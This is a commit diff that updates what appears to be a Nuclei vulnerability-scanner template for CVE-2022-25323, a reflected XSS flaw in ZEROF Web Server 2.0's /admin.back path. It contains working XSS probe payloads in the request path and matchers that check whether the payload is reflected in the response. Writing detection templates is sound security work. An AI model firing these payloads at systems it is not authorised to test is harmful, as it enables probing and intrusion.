Update CVE-2022-25323.yaml
parent
280de89a19
commit
fd011250b3
|
@ -6,20 +6,21 @@ info:
|
|||
severity: medium
|
||||
description: ZEROF Web Server 2.0 allows /admin.back XSS.
|
||||
reference:
|
||||
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
||||
tags: xss,cve,cve2022,zerof
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin.back<img%20src=xxx%20onerror=alert(document.cookie)>"
|
||||
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<img src=xxx onerror=alert(document.cookie)>'
|
||||
- 'back<img src=x onerror=alert(document.domain)>'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
Loading…
Reference in New Issue